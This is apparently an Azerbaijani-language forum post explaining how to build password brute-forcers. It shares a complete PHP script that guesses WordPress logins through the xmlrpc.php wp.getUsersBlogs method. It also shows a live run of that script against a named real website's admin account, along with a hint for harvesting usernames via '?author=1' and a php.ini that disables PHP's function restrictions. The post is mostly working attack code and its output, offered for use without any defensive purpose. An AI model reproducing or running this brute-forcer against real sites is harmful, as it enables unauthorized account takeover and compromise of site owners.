Çox sadəcə.Saytı analiz edərək (əgər private CMS-dirsə) səhv və düzgün cəhdlərdəki fərqlərə əsaslanmaqla bruter yazmaq olar.
Spesifik sualdır və milyonlarla hal ola bilər.
Status code
Responce
Cookie
TIMING
və s.
Bunları da etməyin üçün ən azından PHP-də biliyin olmalıdır müəyyən dərəcədə.
curl_* funksiyaları/if statement/preg_match yaxud da stristr tam olaraq istifadə edilə bilir.
Məsələn wordpress üçün yazdığım xmlrpc API abuse etməklə bruteforce skriptim.
Analoji qayda da sən yazacaqsan.Qeyri-adi heçnə yoxdur yəni.
http://pastebin.com/dHi7qdRw
[blackhat@fedora tmp]$ php -c ~/shellz/xmlrpcbrutewp/php.ini -f /tmp/brut.php admin /home/blackhat/Desktop/founds/1.txt http://verona.am/xmlrpc.php
############################################################
**************** WORDPRESS XMLRPC BRUTEFORCE TOOL **************
********************* Istifade qaydasi ********************
php -f script.php username luget.txt http://domain.adi/xmlrpc.php
****************************************************
Hint: VALID ISTIFADECI ADI: http://domain.adi/?author=1 GRAB ET
HEDEF => http://verona.am/xmlrpc.php
[ 1 ] USERNAME: admin PAROL QISMINDE: ``` ==> Saytdan cavab:[ Incorrect username or password. ]
[ 2 ] USERNAME: admin PAROL QISMINDE: 009213 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 3 ] USERNAME: admin PAROL QISMINDE: 023971 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 4 ] USERNAME: admin PAROL QISMINDE: 025513 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 5 ] USERNAME: admin PAROL QISMINDE: 004777 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 6 ] USERNAME: admin PAROL QISMINDE: 022430 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 7 ] USERNAME: admin PAROL QISMINDE: 039000 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 8 ] USERNAME: admin PAROL QISMINDE: 002511 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 9 ] USERNAME: admin PAROL QISMINDE: 036565 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 10 ] USERNAME: admin PAROL QISMINDE: 095900 ==> Saytdan cavab:[ Incorrect username or password. ]
HEDEF => http://verona.am/xmlrpc.php
[ 11 ] USERNAME: admin PAROL QISMINDE: 098710 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 12 ] USERNAME: admin PAROL QISMINDE: 090932 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 13 ] USERNAME: admin PAROL QISMINDE: 095495 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 14 ] USERNAME: admin PAROL QISMINDE: 0pera ==> Saytdan cavab:[ Incorrect username or password. ]
[ 15 ] USERNAME: admin PAROL QISMINDE: 123593 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 16 ] USERNAME: admin PAROL QISMINDE: 1234com ==> Saytdan cavab:[ Incorrect username or password. ]
[ 17 ] USERNAME: admin PAROL QISMINDE: 12s12s ==> Saytdan cavab:[ Incorrect username or password. ]
[ 18 ] USERNAME: admin PAROL QISMINDE: 123zz ==> Saytdan cavab:[ Incorrect username or password. ]
[ 19 ] USERNAME: admin PAROL QISMINDE: 128764 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 20 ] USERNAME: admin PAROL QISMINDE: 127854 ==> Saytdan cavab:[ Incorrect username or password. ]
HEDEF => http://verona.am/xmlrpc.php
[ 21 ] USERNAME: admin PAROL QISMINDE: 102140 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 22 ] USERNAME: admin PAROL QISMINDE: 105687 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 23 ] USERNAME: admin PAROL QISMINDE: 16ah79 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 24 ] USERNAME: admin PAROL QISMINDE: 148847 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 25 ] USERNAME: admin PAROL QISMINDE: 163305 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 26 ] USERNAME: admin PAROL QISMINDE: 171709 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 27 ] USERNAME: admin PAROL QISMINDE: 167179 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 28 ] USERNAME: admin PAROL QISMINDE: 174170 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 29 ] USERNAME: admin PAROL QISMINDE: 159688 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 30 ] USERNAME: admin PAROL QISMINDE: 153531 ==> Saytdan cavab:[ Incorrect username or password. ]
HEDEF => http://verona.am/xmlrpc.php
[ 31 ] USERNAME: admin PAROL QISMINDE: 194028 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 32 ] USERNAME: admin PAROL QISMINDE: 193349 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 33 ] USERNAME: admin PAROL QISMINDE: 194619 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 34 ] USERNAME: admin PAROL QISMINDE: 20000A ==> Saytdan cavab:[ Incorrect username or password. ]
[ 35 ] USERNAME: admin PAROL QISMINDE: 233077 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 36 ] USERNAME: admin PAROL QISMINDE: 234564 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 37 ] USERNAME: admin PAROL QISMINDE: 216866 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 38 ] USERNAME: admin PAROL QISMINDE: 231041 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 39 ] USERNAME: admin PAROL QISMINDE: 252631 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 40 ] USERNAME: admin PAROL QISMINDE: 24637 ==> Saytdan cavab:[ Incorrect username or password. ]
HEDEF => http://verona.am/xmlrpc.php
[ 41 ] USERNAME: admin PAROL QISMINDE: 248953 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 42 ] USERNAME: admin PAROL QISMINDE: 248168 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 43 ] USERNAME: admin PAROL QISMINDE: 270431 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 44 ] USERNAME: admin PAROL QISMINDE: 28803 ==> Saytdan cavab:[ Incorrect username or password. ]
^C
Kod:
$ cat ~/shellz/xmlrpcbrutewp/php.ini
safe_mode = off
open_basedir=
disable_functions=
[blackhat@fedora ~]$ cat /tmp/brut.php
<?php
/*
Wordpress xmlrpc Bruteforce tool
Coded by AkaStep
*/
error_reporting(0);
ini_set('memory_limit', '6000M');
set_time_limit(0);
$usage='php -f script.php username luget.txt http://domain.adi/xmlrpc.php';
$banner=chr(27) ."[42m" . str_repeat('#',60) . PHP_EOL . ' **************** WORDPRESS XMLRPC BRUTEFORCE TOOL **************' . PHP_EOL .
' ********************* Istifade qaydasi ********************'.
PHP_EOL .$usage . PHP_EOL .
' ****************************************************'. PHP_EOL .
'Hint: VALID ISTIFADECI ADI: http://domain.adi/?author=1 GRAB ET ' . chr(27) . "[0m" .PHP_EOL ;
$uname=$argv[1];
$luget=$argv[2];
$hedef=$argv[3];
if(count($argv) < 4){ die(PHP_EOL . $banner . PHP_EOL);}
echo $banner;
$luget=file($luget) or die('Luget Fayli Aca bilmirem!');
$i=NULL;
foreach($luget as $pass)
{
$i++;
$ch = curl_init();
$curlConfig = array(
CURLOPT_URL => $hedef,
CURLOPT_POST => true,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_TIMEOUT => 5,
CURLOPT_USERAGENT => 'MSIE 8 GECKO 9 BRUTEFORCE TRY MOZILLA GECKO BLAH LINUX PENTEST',
CURLOPT_POSTFIELDS => '<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>
<string>' . $uname . '</string></value></param>
<param><value><string>' . $pass . '</string></value></param></params>
</methodCall>');
curl_setopt_array($ch, $curlConfig);
$result = curl_exec($ch);
$massiv=explode(PHP_EOL,$result);
$result0=str_ireplace(array('<value><string>',
'</string></value>'),'',(string)$massiv[11]);
//echo var_dump($massiv);
if($i % 10==1) {
echo chr(27) . "[43m" . ' HEDEF => ' . preg_replace('/[^A-Za-z0-9\.\\:\\/]/i','',(string)$hedef). chr(27) . "[0m" .PHP_EOL;
}
if(!stristr($result,'Incorrect username or password')) die(PHP_EOL .chr(27) . "[42m" . '=======> TAPILDI! Username: ' . $uname . ' PAROL => ' . $pass . ' ==> Saytdan cavab:[ ' .
preg_replace('/[^A-Za-z]/i','',str_ireplace(array('<member><name>',
'</name>','<value><boolean>','</boolean></value></member>'),'',(string)$massiv[7])) . ' ] ' . ' <======= ' . PHP_EOL . 'HEDEF: ' . $hedef. chr(27) . "[0m" .PHP_EOL);
echo chr(27) . "[41m" . '[ ' . $i . ' ] USERNAME: ' . $uname . ' PAROL QISMINDE: ' . trim($pass) . ' ==> Saytdan cavab:[ ' . trim($result0) . ' ] ' . chr(27) . "[0m" . PHP_EOL ;
curl_close($ch);
}
unset($pass);
?>